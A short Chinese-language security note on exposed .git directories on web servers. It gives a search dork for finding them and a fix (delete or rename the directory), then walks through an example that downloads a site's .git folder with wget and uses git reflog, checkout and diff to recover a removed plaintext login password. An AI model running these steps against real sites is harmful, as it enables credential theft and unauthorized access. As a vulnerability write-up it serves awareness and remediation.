什么是git
漏洞挖掘: `intex:“index of /.git”
修复建议: 删掉.git目录或者重命名此目录
案例:
访问:域名/.git
发现存在目录及文件
下载.git目录:wget -r 域名/.git
查看COMMIT_EDITMSG文件时,发现commit的提交信息,说明当前版本移除了密码
那么就回退之前的版本,查看提交版本信息:git reflog
切换到红框版本: git checkout 49fb627
查看文件差异内容:git diff
,获得明文密码,可用于直接登录